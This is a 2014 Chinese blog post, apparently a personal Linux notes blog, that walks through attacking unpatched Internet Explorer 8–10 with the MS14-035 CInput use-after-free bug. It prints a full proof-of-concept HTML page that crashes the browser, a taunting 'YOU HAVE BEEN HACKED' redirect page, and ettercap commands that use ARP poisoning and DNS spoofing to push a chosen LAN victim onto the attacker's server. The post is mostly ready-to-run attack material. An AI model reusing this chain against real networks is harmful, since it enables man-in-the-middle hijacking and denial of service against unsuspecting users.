注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Linux 折腾笔记

 
 
 
 
 

日志

 
 

利用“MS14-035”,对IE浏览器进行恶意攻击  

2014-07-08 20:53:28|  分类: 漏洞利用 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
这个漏洞可以导致IE浏览器崩溃,涉及的版本有 ie8,9,10,微软在14年6月10日发布了更新补丁,所以现在只能攻击没有更新至今年6月10号的IE浏览器了。详情看这里:
http://www.exploit-db.com/exploits/33860/
如上面介绍,利用这个漏洞,我们需要一段html代码。下面我在本机演示下局域网攻击吧,靶机是安装在虚拟机中的win7_sp1-ie9:
首先修改本机 /var/www 目录下的 index.html 为以下内容:

<html>
<head>
<meta http-equiv="refresh" content="5;url=http://192.168.1.29/poc.html">
<title>YOU HAVE BEEN HACKED</title>
</head>
<body>
you have been hacked,and you will shutdown!!
</body>
</html>

这个是攻击目标首先打开的页面,页面首先显示 “you have been hacked,and you will shutdown!!”,装个逼先;
然后设置 refresh 的时间为5秒("refresh"content=5):5秒后自动打开后面的也就是含有利用ie漏洞的html页面,也就是这里的 http://192.168.1.29/poc.html ,在同目录新建 poc.html 内容为(也可以直接将index.html修改为以下内容):

<html>
<head><title>MS14-035 Internet Explorer CInput Use-after-free POC</title></head>
<body>
<form id="testfm">
<textarea id="child" value="a1" ></textarea>
<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
<textarea id="child3" value="a2" ></textarea>
<input type="text" name="test1">
</form>
<script>
var startfl=false;
function changer() {
 // Call of changer function will happen inside mshtml!CFormElement::DoReset call, after execution of this function crash in DoReset will happen when accessing freed CInput element
   if (startfl) {
       document.getElementById("testfm").innerHTML = ""; // Destroy form contents, free next CInput in DoReset
       CollectGarbage();
   }
}
document.getElementById("child2").checked = true;
document.getElementById("child2").onpropertychange=changer;
startfl = true;
document.getElementById("testfm").reset(); // DoReset call
</script>
</body>
</html>

然后打开 apache2,再然后使用 ettercap 进行 dns 欺骗:

service apache2 start
ettercap -TqP dns_spoof -M arp:remote /192.168.1.27/ //


看下效果:
利用“MS14-035”,对IE浏览器进行恶意攻击 - xiao106347 - Linux 折腾笔记
  评论这张
 
阅读(5289)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016